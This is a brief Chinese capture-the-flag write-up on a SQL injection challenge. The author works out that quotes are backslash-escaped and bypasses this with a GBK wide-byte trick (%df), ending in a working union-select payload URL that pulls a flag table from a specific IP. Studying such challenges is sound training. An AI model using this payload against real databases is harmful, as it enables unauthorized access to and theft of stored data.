sql injection 3
打开就看见
执行的sql语句:SELECT id,title FROM news WHERE id=’1’
尝试闭合'
构造语句,发现无论怎么构造都会出现\
http://115.28.150.176/sqli/index.php?id=1’ select * from news
看来需要干掉/
。尝试id ,发现id=2
时出现提示
id: 2 title: gbk_sql_injection
看来是宽字节注入
可知当存在%df
时就会吃掉\
多次尝试,最终构造
http://115.28.150.176/sqli/index.php?id=%df’ union select *,1 from flag%23
出现flag